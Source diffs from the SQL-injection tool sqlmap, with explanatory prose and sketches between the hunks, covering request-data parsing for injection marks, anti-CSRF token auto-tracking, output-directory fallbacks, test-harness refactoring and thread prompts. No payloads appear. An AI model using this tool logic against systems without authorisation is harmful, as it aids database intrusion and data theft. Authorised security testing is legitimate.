-from lib.core.settings import SOAP_RECOGNITION_REGEX
 from lib.core.settings import SUPPORTED_DBMS
 from lib.core.settings import UNENCODED_ORIGINAL_VALUE
 from lib.core.settings import UNICODE_ENCODING
 from lib.core.settings import UNKNOWN_DBMS_VERSION
 from lib.core.settings import URI_INJECTABLE_REGEX
 from lib.core.settings import USER_AGENT_ALIASES
+from lib.core.settings import XML_RECOGNITION_REGEX
 from lib.utils.hashdb import HashDB
 from lib.core.xmldump import dumper as xmldumper
 from thirdparty.odict.odict import OrderedDict
@@ -88,6 +97,7 @@ def _setRequestParams():

     if conf.data is not None:
         conf.method = HTTPMETHOD.POST if not conf.method or conf.method == HTTPMETHOD.GET else conf.method
+        hintNames = []

         def process(match, repl):
             retVal = match.group(0)
@@ -100,7 +110,8 @@ def _setRequestParams():
                        retVal = retVal.replace(_.group(0), match.group(int(_.group(1)) if _.group(1).isdigit() else _.group(1)))
                    else:
                        break
+            if CUSTOM_INJECTION_MARK_CHAR in retVal:
+                hintNames.append((retVal.split(CUSTOM_INJECTION_MARK_CHAR)[0], match.group("name")))
             return retVal

         if kb.processUserMarks is None and CUSTOM_INJECTION_MARK_CHAR in conf.data:
@@ -112,9 +123,15 @@ def _setRequestParams():
             else:
                 kb.processUserMarks = not test or test[0] not in ("n", "N")

+                if kb.processUserMarks and "=%s" % CUSTOM_INJECTION_MARK_CHAR in conf.data:
+                    warnMsg = "it seems that you've provided empty parameter value(s) "
+                    warnMsg += "for testing. Please, always use only valid parameter values "
+                    warnMsg += "so sqlmap could be able to run properly"
+                    logger.warn(warnMsg)
+
         if not (kb.processUserMarks and CUSTOM_INJECTION_MARK_CHAR in conf.data):
             if re.search(JSON_RECOGNITION_REGEX, conf.data):
-                message = "JSON like data found in %s data. " % conf.method
+                message = "JSON data found in %s data. " % conf.method
                 message += "Do you want to process it? [Y/n/q] "
                 test = readInput(message, default="Y")
                 if test and test[0] in ("q", "Q"):
@@ -123,10 +140,39 @@ def _setRequestParams():
                     conf.data = conf.data.replace(CUSTOM_INJECTION_MARK_CHAR, ASTERISK_MARKER)
                     conf.data = re.sub(r'("(?P<name>[^"]+)"\s*:\s*"[^"]+)"', functools.partial(process, repl=r'\g<1>%s"' % CUSTOM_INJECTION_MARK_CHAR), conf.data)
                     conf.data = re.sub(r'("(?P<name>[^"]+)"\s*:\s*)(-?\d[\d\.]*\b)', functools.partial(process, repl=r'\g<0>%s' % CUSTOM_INJECTION_MARK_CHAR), conf.data)
+                    match = re.search(r'(?P<name>[^"]+)"\s*:\s*\[([^\]]+)\]', conf.data)
+                    if match and not (conf.testParameter and match.group("name") not in conf.testParameter):
+                        _ = match.group(2)
+                        _ = re.sub(r'("[^"]+)"', '\g<1>%s"' % CUSTOM_INJECTION_MARK_CHAR, _)
+                        _ = re.sub(r'(\A|,|\s+)(-?\d[\d\.]*\b)', '\g<0>%s' % CUSTOM_INJECTION_MARK_CHAR, _)
+                        conf.data = conf.data.replace(match.group(0), match.group(0).replace(match.group(2), _))
                     kb.postHint = POST_HINT.JSON

-            elif re.search(SOAP_RECOGNITION_REGEX, conf.data):
-                message = "SOAP/XML like data found in %s data. " % conf.method
+            elif re.search(JSON_LIKE_RECOGNITION_REGEX, conf.data):
+                message = "JSON-like data found in %s data. " % conf.method
+                message += "Do you want to process it? [Y/n/q] "
+                test = readInput(message, default="Y")
+                if test and test[0] in ("q", "Q"):
+                    raise SqlmapUserQuitException
+                elif test[0] not in ("n", "N"):
+                    conf.data = conf.data.replace(CUSTOM_INJECTION_MARK_CHAR, ASTERISK_MARKER)
+                    conf.data = re.sub(r"('(?P<name>[^']+)'\s*:\s*'[^']+)'", functools.partial(process, repl=r"\g<1>%s'" % CUSTOM_INJECTION_MARK_CHAR), conf.data)
+                    conf.data = re.sub(r"('(?P<name>[^']+)'\s*:\s*)(-?\d[\d\.]*\b)", functools.partial(process, repl=r"\g<0>%s" % CUSTOM_INJECTION_MARK_CHAR), conf.data)
+                    kb.postHint = POST_HINT.JSON_LIKE
+
+            elif re.search(ARRAY_LIKE_RECOGNITION_REGEX, conf.data):
+                message = "Array-like data found in %s data. " % conf.method
+                message += "Do you want to process it? [Y/n/q] "
+                test = readInput(message, default="Y")
+                if test and test[0] in ("q", "Q"):
+                    raise SqlmapUserQuitException
+                elif test[0] not in ("n", "N"):
+                    conf.data = conf.data.replace(CUSTOM_INJECTION_MARK_CHAR, ASTERISK_MARKER)
+                    conf.data = re.sub(r"(=[^%s]+)" % DEFAULT_GET_POST_DELIMITER, r"\g<1>%s" % CUSTOM_INJECTION_MARK_CHAR, conf.data)
+                    kb.postHint = POST_HINT.ARRAY_LIKE
+
+            elif re.search(XML_RECOGNITION_REGEX, conf.data):
+                message = "SOAP/XML data found in %s data. " % conf.method
                 message += "Do you want to process it? [Y/n/q] "
                 test = readInput(message, default="Y")
                 if test and test[0] in ("q", "Q"):
@@ -137,14 +183,14 @@ def _setRequestParams():
                     kb.postHint = POST_HINT.SOAP if "soap" in conf.data.lower() else POST_HINT.XML

             elif re.search(MULTIPART_RECOGNITION_REGEX, conf.data):
-                message = "Multipart like data found in %s data. " % conf.method
+                message = "Multipart-like data found in %s data. " % conf.method
                 message += "Do you want to process it? [Y/n/q] "
                 test = readInput(message, default="Y")
                 if test and test[0] in ("q", "Q"):
                     raise SqlmapUserQuitException
                 elif test[0] not in ("n", "N"):
                     conf.data = conf.data.replace(CUSTOM_INJECTION_MARK_CHAR, ASTERISK_MARKER)
-                    conf.data = re.sub(r"(?si)(Content-Disposition.+?)((\r)?\n--)", r"\g<1>%s\g<2>" % CUSTOM_INJECTION_MARK_CHAR, conf.data)
+                    conf.data = re.sub(r"(?si)((Content-Disposition[^\n]+?name\s*=\s*[\"'](?P<name>[^\n]+?)[\"']).+?)(((\r)?\n)+--)", functools.partial(process, repl=r"\g<1>%s\g<4>" % CUSTOM_INJECTION_MARK_CHAR), conf.data)
                     kb.postHint = POST_HINT.MULTIPART

         if not kb.postHint:
@@ -165,7 +211,7 @@ def _setRequestParams():

     kb.processUserMarks = True if (kb.postHint and CUSTOM_INJECTION_MARK_CHAR in conf.data) else kb.processUserMarks

-    if re.search(URI_INJECTABLE_REGEX, conf.url, re.I) and not any(place in conf.parameters for place in (PLACE.GET, PLACE.POST)) and not kb.postHint:
+    if re.search(URI_INJECTABLE_REGEX, conf.url, re.I) and not any(place in conf.parameters for place in (PLACE.GET, PLACE.POST)) and not kb.postHint and not CUSTOM_INJECTION_MARK_CHAR in (conf.data or "") and conf.url.startswith("http"):
         warnMsg = "you've provided target URL without any GET "
         warnMsg += "parameters (e.g. www.site.com/article.php?id=1) "
         warnMsg += "and without providing any POST parameters "
@@ -195,6 +241,12 @@ def _setRequestParams():
             else:
                 kb.processUserMarks = not test or test[0] not in ("n", "N")

+                if kb.processUserMarks and "=%s" % CUSTOM_INJECTION_MARK_CHAR in _:
+                    warnMsg = "it seems that you've provided empty parameter value(s) "
+                    warnMsg += "for testing. Please, always use only valid parameter values "
+                    warnMsg += "so sqlmap could be able to run properly"
+                    logger.warn(warnMsg)
+
         if not kb.processUserMarks:
             if place == PLACE.URI:
                 query = urlparse.urlsplit(value).query
@@ -230,7 +282,15 @@ def _setRequestParams():
            parts = value.split(CUSTOM_INJECTION_MARK_CHAR)

            for i in xrange(len(parts) - 1):
-                conf.paramDict[place]["%s#%d%s" % (("%s " % kb.postHint) if kb.postHint else "", i + 1, CUSTOM_INJECTION_MARK_CHAR)] = "".join("%s%s" % (parts[j], CUSTOM_INJECTION_MARK_CHAR if i == j else "") for j in xrange(len(parts)))
+                name = None
+                if kb.postHint:
+                    for ending, _ in hintNames:
+                        if parts[i].endswith(ending):
+                            name = "%s %s" % (kb.postHint, _)
+                            break
+                if name is None:
+                    name = "%s#%s%s" % (("%s " % kb.postHint) if kb.postHint else "", i + 1, CUSTOM_INJECTION_MARK_CHAR)
+                conf.paramDict[place][name] = "".join("%s%s" % (parts[j], CUSTOM_INJECTION_MARK_CHAR if i == j else "") for j in xrange(len(parts)))

         if place == PLACE.URI and PLACE.GET in conf.paramDict:
             del conf.paramDict[PLACE.GET]
@@ -298,13 +358,29 @@ def _setRequestParams():
            errMsg += "within the given request data"
            raise SqlmapGenericException(errMsg)

+    if conf.csrfToken:
+        if not any(conf.csrfToken in _ for _ in (conf.paramDict.get(PLACE.GET, {}), conf.paramDict.get(PLACE.POST, {}))) and not conf.csrfToken in set(_[0].lower() for _ in conf.httpHeaders) and not conf.csrfToken in conf.paramDict.get(PLACE.COOKIE, {}):
+            errMsg = "anti-CSRF token parameter '%s' not " % conf.csrfToken
+            errMsg += "found in provided GET, POST, Cookie or header values"
+            raise SqlmapGenericException(errMsg)
+    else:
+        for place in (PLACE.GET, PLACE.POST, PLACE.COOKIE):
+            for parameter in conf.paramDict.get(place, {}):
+                if any(parameter.lower().count(_) for _ in CSRF_TOKEN_PARAMETER_INFIXES):
+                    message = "%s parameter '%s' appears to hold anti-CSRF token. " % (place, parameter)
+                    message += "Do you want sqlmap to automatically update it in further requests? [y/N] "
+                    test = readInput(message, default="N")
+                    if test and test[0] in ("y", "Y"):
+                        conf.csrfToken = parameter
+                    break
+
 def _setHashDB():
     """
     Check and set the HashDB SQLite file for query resume functionality.
     """

     if not conf.hashDBFile:
-        conf.hashDBFile = conf.sessionFile or "%s%ssession.sqlite" % (conf.outputPath, os.sep)
+        conf.hashDBFile = conf.sessionFile or os.path.join(conf.outputPath, "session.sqlite")

     if os.path.exists(conf.hashDBFile):
         if conf.flushSession:
@@ -332,7 +408,7 @@ def _resumeHashDBValues():
     conf.tmpPath = conf.tmpPath or hashDBRetrieve(HASHDB_KEYS.CONF_TMP_PATH)

     for injection in hashDBRetrieve(HASHDB_KEYS.KB_INJECTIONS, True) or []:
-        if injection.place in conf.paramDict and \
+        if isinstance(injection, InjectionDict) and injection.place in conf.paramDict and \
            injection.parameter in conf.paramDict[injection.place]:

            if not conf.tech or intersect(conf.tech, injection.data.keys()):
@@ -432,8 +508,23 @@ def _setResultsFile():
        return

    if not conf.resultsFP:
-        conf.resultsFilename = "%s%s%s" % (paths.SQLMAP_OUTPUT_PATH, os.sep, time.strftime(RESULTS_FILE_FORMAT).lower())
-        conf.resultsFP = codecs.open(conf.resultsFilename, "w+", UNICODE_ENCODING, buffering=0)
+        conf.resultsFilename = os.path.join(paths.SQLMAP_OUTPUT_PATH, time.strftime(RESULTS_FILE_FORMAT).lower())
+        try:
+            conf.resultsFP = openFile(conf.resultsFilename, "w+", UNICODE_ENCODING, buffering=0)
+        except (OSError, IOError), ex:
+            try:
+                warnMsg = "unable to create results file '%s' ('%s'). " % (conf.resultsFilename, getUnicode(ex))
+                conf.resultsFilename = tempfile.mkstemp(prefix="sqlmapresults-", suffix=".csv")[1]
+                conf.resultsFP = openFile(conf.resultsFilename, "w+", UNICODE_ENCODING, buffering=0)
+                warnMsg += "Using temporary file '%s' instead" % conf.resultsFilename
+                logger.warn(warnMsg)
+            except IOError, _:
+                errMsg = "unable to write to the temporary directory ('%s'). " % _
+                errMsg += "Please make sure that your disk is not full and "
+                errMsg += "that you have sufficient write permissions to "
+                errMsg += "create temporary files and/or directories"
+                raise SqlmapSystemException(errMsg)

        conf.resultsFP.writelines("Target URL,Place,Parameter,Techniques%s" % os.linesep)

        logger.info("using '%s' as the CSV results file in multiple targets mode" % conf.resultsFilename)
@@ -449,7 +540,16 @@ def _createFilesDir():
    conf.filePath = paths.SQLMAP_FILES_PATH % conf.hostname

    if not os.path.isdir(conf.filePath):
-        os.makedirs(conf.filePath, 0755)
+        try:
+            os.makedirs(conf.filePath, 0755)
+        except OSError, ex:
+            tempDir = tempfile.mkdtemp(prefix="sqlmapfiles")
+            warnMsg = "unable to create files directory "
+            warnMsg += "'%s' (%s). " % (conf.filePath, getUnicode(ex))
+            warnMsg += "Using temporary directory '%s' instead" % tempDir
+            logger.warn(warnMsg)
+
+            conf.filePath = tempDir

 def _createDumpDir():
    """
@@ -462,7 +562,16 @@ def _createDumpDir():
    conf.dumpPath = paths.SQLMAP_DUMP_PATH % conf.hostname

    if not os.path.isdir(conf.dumpPath):
-        os.makedirs(conf.dumpPath, 0755)
+        try:
+            os.makedirs(conf.dumpPath, 0755)
+        except OSError, ex:
+            tempDir = tempfile.mkdtemp(prefix="sqlmapdump")
+            warnMsg = "unable to create dump directory "
+            warnMsg += "'%s' (%s). " % (conf.dumpPath, getUnicode(ex))
+            warnMsg += "Using temporary directory '%s' instead" % tempDir
+            logger.warn(warnMsg)
+
+            conf.dumpPath = tempDir

 def _configureDumper():
    if hasattr(conf, 'xmlFile') and conf.xmlFile:
@@ -479,26 +588,45 @@ def _createTargetDirs():

    if not os.path.isdir(paths.SQLMAP_OUTPUT_PATH):
        try:
-            os.makedirs(paths.SQLMAP_OUTPUT_PATH, 0755)
-        except OSError, ex:
-            tempDir = tempfile.mkdtemp(prefix="sqlmapoutput")
-            warnMsg = "unable to create default root output directory "
-            warnMsg += "'%s' (%s). " % (paths.SQLMAP_OUTPUT_PATH, ex)
-            warnMsg += "using temporary directory '%s' instead" % tempDir
+            if not os.path.isdir(paths.SQLMAP_OUTPUT_PATH):
+                os.makedirs(paths.SQLMAP_OUTPUT_PATH, 0755)
+            warnMsg = "using '%s' as the output directory" % paths.SQLMAP_OUTPUT_PATH
+            logger.warn(warnMsg)
+        except (OSError, IOError), ex:
+            try:
+                tempDir = tempfile.mkdtemp(prefix="sqlmapoutput")
+            except Exception, _:
+                errMsg = "unable to write to the temporary directory ('%s'). " % _
+                errMsg += "Please make sure that your disk is not full and "
+                errMsg += "that you have sufficient write permissions to "
+                errMsg += "create temporary files and/or directories"
+                raise SqlmapSystemException(errMsg)
+
+            warnMsg = "unable to create regular output directory "
+            warnMsg += "'%s' (%s). " % (paths.SQLMAP_OUTPUT_PATH, getUnicode(ex))
+            warnMsg += "Using temporary directory '%s' instead" % tempDir
            logger.warn(warnMsg)

            paths.SQLMAP_OUTPUT_PATH = tempDir

-    conf.outputPath = "%s%s%s" % (paths.SQLMAP_OUTPUT_PATH, os.sep, conf.hostname)
+    conf.outputPath = os.path.join(getUnicode(paths.SQLMAP_OUTPUT_PATH), normalizeUnicode(getUnicode(conf.hostname)))

    if not os.path.isdir(conf.outputPath):
        try:
            os.makedirs(conf.outputPath, 0755)
-        except OSError, ex:
-            tempDir = tempfile.mkdtemp(prefix="sqlmapoutput")
+        except (OSError, IOError), ex:
+            try:
+                tempDir = tempfile.mkdtemp(prefix="sqlmapoutput")
+            except Exception, _:
+                errMsg = "unable to write to the temporary directory ('%s'). " % _
+                errMsg += "Please make sure that your disk is not full and "
+                errMsg += "that you have sufficient write permissions to "
+                errMsg += "create temporary files and/or directories"
+                raise SqlmapSystemException(errMsg)
+
            warnMsg = "unable to create output directory "
-            warnMsg += "'%s' (%s). " % (conf.outputPath, ex)
-            warnMsg += "using temporary directory '%s' instead" % tempDir
+            warnMsg += "'%s' (%s). " % (conf.outputPath, getUnicode(ex))
+            warnMsg += "Using temporary directory '%s' instead" % tempDir
            logger.warn(warnMsg)

            conf.outputPath = tempDir
@@ -508,9 +636,9 @@ def _createTargetDirs():
            f.write(kb.originalUrls.get(conf.url) or conf.url or conf.hostname)
            f.write(" (%s)" % (HTTPMETHOD.POST if conf.data else HTTPMETHOD.GET))
            if conf.data:
-                f.write("\n\n%s" % conf.data)
+                f.write("\n\n%s" % getUnicode(conf.data))
        except IOError, ex:
-            if "denied" in str(ex):
+            if "denied" in getUnicode(ex):
                errMsg = "you don't have enough permissions "
            else:
                errMsg = "something went wrong while trying "
@@ -555,11 +683,15 @@ def initTargetEnv():
            class _(unicode):
                pass

-            original = conf.data
-            conf.data = _(urldecode(conf.data))
-            setattr(conf.data, UNENCODED_ORIGINAL_VALUE, original)
-            kb.postSpaceToPlus = '+' in original
+            for key, value in conf.httpHeaders:
+                if key.upper() == HTTP_HEADER.CONTENT_TYPE.upper():
+                    kb.postUrlEncode = "urlencoded" in value
+                    break
+            if kb.postUrlEncode:
+                original = conf.data
+                conf.data = _(urldecode(conf.data))
+                setattr(conf.data, UNENCODED_ORIGINAL_VALUE, original)
+                kb.postSpaceToPlus = '+' in original

 def setupTargetEnv():
    _createTargetDirs()
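One of the additions above auto-detects request parameters that look like anti-CSRF tokens by checking their names against a list of infixes and then asking the user whether to track them. A rough standalone sketch of that idea (the infix list and the parameter dictionary below are illustrative examples, not the project's own values):

    # Sketch: flag request parameters whose names suggest an anti-CSRF token.
    CSRF_TOKEN_PARAMETER_INFIXES = ("csrf", "xsrf", "token")  # illustrative infixes

    def find_csrf_candidates(param_dict):
        """Yield (place, parameter) pairs whose name contains a token-like infix."""
        for place, params in param_dict.items():
            for parameter in params:
                if any(infix in parameter.lower() for infix in CSRF_TOKEN_PARAMETER_INFIXES):
                    yield place, parameter

    params = {"POST": {"id": "1", "csrfmiddlewaretoken": "abc123"}}
    for place, parameter in find_csrf_candidates(params):
        print("%s parameter '%s' appears to hold an anti-CSRF token" % (place, parameter))
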
@@ -1,7 +1,7 @@
 #!/usr/bin/env python

 """
-Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """

@@ -35,9 +35,10 @@ from lib.core.optiondict import optDict
 from lib.core.settings import UNICODE_ENCODING
 from lib.parse.cmdline import cmdLineParser

-failedItem = None
-failedParseOn = None
-failedTraceBack = None
+class Failures(object):
+    failedItems = None
+    failedParseOn = None
+    failedTraceBack = None

 def smokeTest():
     """
@@ -110,10 +111,6 @@ def liveTest():
     Runs the test of a program against the live testing environment
     """

-    global failedItem
-    global failedParseOn
-    global failedTraceBack
-
     retVal = True
     count = 0
     global_ = {}
@@ -192,13 +189,13 @@ def liveTest():
             logger.info("test passed")
             cleanCase()
         else:
-            errMsg = "test failed "
+            errMsg = "test failed"

-            if failedItem:
-                errMsg += "at parsing item \"%s\" " % failedItem
+            if Failures.failedItems:
+                errMsg += " at parsing items: %s" % ", ".join(i for i in Failures.failedItems)

-            errMsg += "- scan folder: %s " % paths.SQLMAP_OUTPUT_PATH
-            errMsg += "- traceback: %s" % bool(failedTraceBack)
+            errMsg += " - scan folder: %s" % paths.SQLMAP_OUTPUT_PATH
+            errMsg += " - traceback: %s" % bool(Failures.failedTraceBack)

             if not vulnerable:
                 errMsg += " - SQL injection not detected"
@@ -206,14 +203,14 @@ def liveTest():
             logger.error(errMsg)
             test_case_fd.write("%s\n" % errMsg)

-            if failedParseOn:
+            if Failures.failedParseOn:
                 console_output_fd = codecs.open(os.path.join(paths.SQLMAP_OUTPUT_PATH, "console_output"), "wb", UNICODE_ENCODING)
-                console_output_fd.write(failedParseOn)
+                console_output_fd.write(Failures.failedParseOn)
                 console_output_fd.close()

-            if failedTraceBack:
+            if Failures.failedTraceBack:
                 traceback_fd = codecs.open(os.path.join(paths.SQLMAP_OUTPUT_PATH, "traceback"), "wb", UNICODE_ENCODING)
-                traceback_fd.write(failedTraceBack)
+                traceback_fd.write(Failures.failedTraceBack)
                 traceback_fd.close()

             beep()
@@ -234,13 +231,9 @@ def liveTest():
     return retVal

 def initCase(switches, count):
-    global failedItem
-    global failedParseOn
-    global failedTraceBack
-
-    failedItem = None
-    failedParseOn = None
-    failedTraceBack = None
+    Failures.failedItems = []
+    Failures.failedParseOn = None
+    Failures.failedTraceBack = None

     paths.SQLMAP_OUTPUT_PATH = tempfile.mkdtemp(prefix="sqlmaptest-%d-" % count)
     paths.SQLMAP_DUMP_PATH = os.path.join(paths.SQLMAP_OUTPUT_PATH, "%s", "dump")
@@ -264,10 +257,6 @@ def cleanCase():
     shutil.rmtree(paths.SQLMAP_OUTPUT_PATH, True)

 def runCase(parse):
-    global failedItem
-    global failedParseOn
-    global failedTraceBack
-
     retVal = True
     handled_exception = None
     unhandled_exception = None
@@ -288,15 +277,15 @@ def runCase(parse):
     LOGGER_HANDLER.stream = sys.stdout = sys.__stdout__

     if unhandled_exception:
-        failedTraceBack = "unhandled exception: %s" % str(traceback.format_exc())
+        Failures.failedTraceBack = "unhandled exception: %s" % str(traceback.format_exc())
         retVal = None
     elif handled_exception:
-        failedTraceBack = "handled exception: %s" % str(traceback.format_exc())
+        Failures.failedTraceBack = "handled exception: %s" % str(traceback.format_exc())
         retVal = None
     elif result is False: # this means no SQL injection has been detected - if None, ignore
         retVal = False

-    console = getUnicode(console, system=True)
+    console = getUnicode(console, encoding=sys.stdin.encoding)

     if parse and retVal:
         with codecs.open(conf.dumper.getOutputFile(), "rb", UNICODE_ENCODING) as f:
@@ -308,19 +297,17 @@ def runCase(parse):
             if item.startswith("r'") and item.endswith("'"):
                 if not re.search(item[2:-1], parse_on, re.DOTALL):
                     retVal = None
-                    failedItem = item
-                    break
+                    Failures.failedItems.append(item)

             elif item not in parse_on:
                 retVal = None
-                failedItem = item
-                break
+                Failures.failedItems.append(item)

-        if failedItem is not None:
-            failedParseOn = console
+        if Failures.failedItems:
+            Failures.failedParseOn = console

     elif retVal is False:
-        failedParseOn = console
+        Failures.failedParseOn = console

     return retVal
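The refactoring above replaces three module-level globals with attributes on a small holder class, which removes the need for `global` statements in every function and lets failures accumulate in a list instead of keeping only the last one. Sketched in isolation:

    # Sketch: a class used purely as a namespace for shared mutable test state.
    class Failures(object):
        failedItems = None
        failedParseOn = None
        failedTraceBack = None

    def init_case():
        # No `global` statements needed: attributes are set on the class object itself.
        Failures.failedItems = []
        Failures.failedParseOn = None
        Failures.failedTraceBack = None

    def record_failure(item, console_output):
        Failures.failedItems.append(item)
        Failures.failedParseOn = console_output

    init_case()
    record_failure("expected_string", "console dump ...")
    print(Failures.failedItems)  # ['expected_string']
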
@@ -1,7 +1,7 @@
 #!/usr/bin/env python

 """
-Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """

@@ -106,20 +106,25 @@ def runThreads(numThreads, threadFunction, cleanupFunction=None, forwardExceptio
     kb.threadContinue = True
     kb.threadException = False

-    if threadChoice and numThreads == 1 and any(_ in kb.injection.data for _ in (PAYLOAD.TECHNIQUE.BOOLEAN, PAYLOAD.TECHNIQUE.ERROR, PAYLOAD.TECHNIQUE.QUERY, PAYLOAD.TECHNIQUE.UNION)):
+    if threadChoice and numThreads == 1 and not (kb.injection.data and not any(_ not in (PAYLOAD.TECHNIQUE.TIME, PAYLOAD.TECHNIQUE.STACKED) for _ in kb.injection.data)):
         while True:
             message = "please enter number of threads? [Enter for %d (current)] " % numThreads
             choice = readInput(message, default=str(numThreads))
-            if choice and choice.isdigit():
-                if int(choice) > MAX_NUMBER_OF_THREADS:
-                    errMsg = "maximum number of used threads is %d avoiding potential connection issues" % MAX_NUMBER_OF_THREADS
-                    logger.critical(errMsg)
-                else:
-                    numThreads = int(choice)
-                    break
+            if choice:
+                skipThreadCheck = False
+                if choice.endswith('!'):
+                    choice = choice[:-1]
+                    skipThreadCheck = True
+                if choice.isdigit():
+                    if int(choice) > MAX_NUMBER_OF_THREADS and not skipThreadCheck:
+                        errMsg = "maximum number of used threads is %d avoiding potential connection issues" % MAX_NUMBER_OF_THREADS
+                        logger.critical(errMsg)
+                    else:
+                        conf.threads = numThreads = int(choice)
+                        break

     if numThreads == 1:
-        warnMsg = "running in a single-thread mode. This could take a while."
+        warnMsg = "running in a single-thread mode. This could take a while"
         logger.warn(warnMsg)

     try:
@@ -140,7 +145,7 @@ def runThreads(numThreads, threadFunction, cleanupFunction=None, forwardExceptio
             try:
                 thread.start()
             except threadError, errMsg:
-                errMsg = "error occured while starting new thread ('%s')" % errMsg
+                errMsg = "error occurred while starting new thread ('%s')" % errMsg
                 logger.critical(errMsg)
                 break
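The prompt logic above lets a trailing '!' bypass the maximum-thread sanity check. A compact sketch of that parsing, with a made-up limit and the interactive prompt factored out:

    # Sketch: parse a thread-count answer where a trailing '!' skips the upper-bound check.
    MAX_NUMBER_OF_THREADS = 10  # illustrative limit

    def parse_thread_choice(choice, current):
        """Return the accepted thread count, or None if the answer was rejected."""
        if not choice:
            return current
        skip_check = choice.endswith("!")
        if skip_check:
            choice = choice[:-1]
        if not choice.isdigit():
            return None
        value = int(choice)
        if value > MAX_NUMBER_OF_THREADS and not skip_check:
            print("maximum number of used threads is %d" % MAX_NUMBER_OF_THREADS)
            return None
        return value

    assert parse_thread_choice("8", 1) == 8
    assert parse_thread_choice("50", 1) is None   # above the limit
    assert parse_thread_choice("50!", 1) == 50    # '!' overrides the limit
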
@@ -1,7 +1,7 @@
 #!/usr/bin/env python

 """
-Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """

@@ -1,7 +1,7 @@
 #!/usr/bin/env python

 """
-Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """

@@ -41,7 +41,7 @@ def update():
         logger.debug(debugMsg)

         dataToStdout("\r[%s] [INFO] update in progress " % time.strftime("%X"))
-        process = execute("git pull %s HEAD" % GIT_REPOSITORY, shell=True, stdout=PIPE, stderr=PIPE)
+        process = execute("git checkout . && git pull %s HEAD" % GIT_REPOSITORY, shell=True, stdout=PIPE, stderr=PIPE)
         pollProcess(process, True)
         stdout, stderr = process.communicate()
         success = not process.returncode
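The update hunk above prepends `git checkout .` so that locally modified files are reverted before pulling. A hedged standalone equivalent using plain subprocess (the helper name and working-directory argument are assumptions for illustration):

    # Sketch: revert local modifications, then pull from the remote repository.
    import subprocess

    GIT_REPOSITORY = "https://github.com/sqlmapproject/sqlmap.git"

    def update_checkout(workdir="."):
        process = subprocess.Popen(
            "git checkout . && git pull %s HEAD" % GIT_REPOSITORY,
            shell=True,
            cwd=workdir,
            stdout=subprocess.PIPE,
            stderr=subprocess.PIPE,
        )
        stdout, stderr = process.communicate()
        return process.returncode == 0, stdout, stderr
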
@@ -1,7 +1,7 @@
 #!/usr/bin/env python

 """
-Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """

@@ -9,6 +9,7 @@ import os
 import zipfile

 from lib.core.exception import SqlmapDataException
+from lib.core.exception import SqlmapInstallationException
 from lib.core.settings import UNICODE_ENCODING

 class Wordlist(object):
@@ -21,6 +22,7 @@ class Wordlist(object):
         self.fp = None
         self.index = 0
         self.counter = -1
+        self.current = None
         self.iter = None
         self.custom = custom or []
         self.proc_id = proc_id
@@ -37,15 +39,15 @@ class Wordlist(object):
         elif self.index == len(self.filenames):
             self.iter = iter(self.custom)
         else:
-            current = self.filenames[self.index]
-            if os.path.splitext(current)[1].lower() == ".zip":
-                _ = zipfile.ZipFile(current, 'r')
+            self.current = self.filenames[self.index]
+            if os.path.splitext(self.current)[1].lower() == ".zip":
+                _ = zipfile.ZipFile(self.current, 'r')
                 if len(_.namelist()) == 0:
-                    errMsg = "no file(s) inside '%s'" % current
+                    errMsg = "no file(s) inside '%s'" % self.current
                     raise SqlmapDataException(errMsg)
                 self.fp = _.open(_.namelist()[0])
             else:
-                self.fp = open(current, 'r')
+                self.fp = open(self.current, 'r')
             self.iter = iter(self.fp)

         self.index += 1
@@ -61,6 +63,11 @@ class Wordlist(object):
         self.counter += 1
         try:
             retVal = self.iter.next().rstrip()
+        except zipfile.error, ex:
+            errMsg = "something seems to be wrong with "
+            errMsg += "the file '%s' ('%s'). Please make " % (self.current, ex)
+            errMsg += "sure that you haven't made any changes to it"
+            raise SqlmapInstallationException, errMsg
         except StopIteration:
             self.adjust()
             retVal = self.iter.next().rstrip()
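A simplified sketch of the wordlist iteration pattern touched above: remember the current filename, open either a plain file or the first member of a ZIP archive, and turn low-level zipfile errors into a readable message naming the offending file. Written in Python 3 syntax; file names are examples only.

    # Sketch: iterate words from plain-text or zipped wordlists, reporting the offending file.
    import os
    import zipfile

    def iter_wordlist(filenames):
        for current in filenames:
            try:
                if os.path.splitext(current)[1].lower() == ".zip":
                    archive = zipfile.ZipFile(current, "r")
                    names = archive.namelist()
                    if not names:
                        raise ValueError("no file(s) inside '%s'" % current)
                    fp = archive.open(names[0])
                else:
                    fp = open(current, "rb")
                with fp:
                    for line in fp:
                        yield line.rstrip()
            except zipfile.BadZipFile as ex:
                raise RuntimeError(
                    "something seems to be wrong with the file '%s' ('%s'); "
                    "please make sure that you haven't made any changes to it" % (current, ex)
                )

    # Usage: for word in iter_wordlist(["wordlist.zip", "extra.txt"]): ...
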
@@ -1,7 +1,7 @@
 #!/usr/bin/env python

 """
-Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """

@@ -1,7 +1,7 @@
 #!/usr/bin/env python

 """
-Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """

@@ -9,7 +9,6 @@ import re

 from xml.sax.handler import ContentHandler

-from lib.core.common import checkFile
 from lib.core.common import Backend
 from lib.core.common import parseXmlFile
 from lib.core.common import sanitizeStr
@@ -63,7 +62,7 @@ class MSSQLBannerHandler(ContentHandler):
     def endElement(self, name):
         if name == "signature":
             for version in (self._version, self._versionAlt):
-                if version and re.search(r" %s[\.\ ]+" % version, self._banner):
+                if version and re.search(r" %s[\.\ ]+" % re.escape(version), self._banner):
                     self._feedInfo("dbmsRelease", self._release)
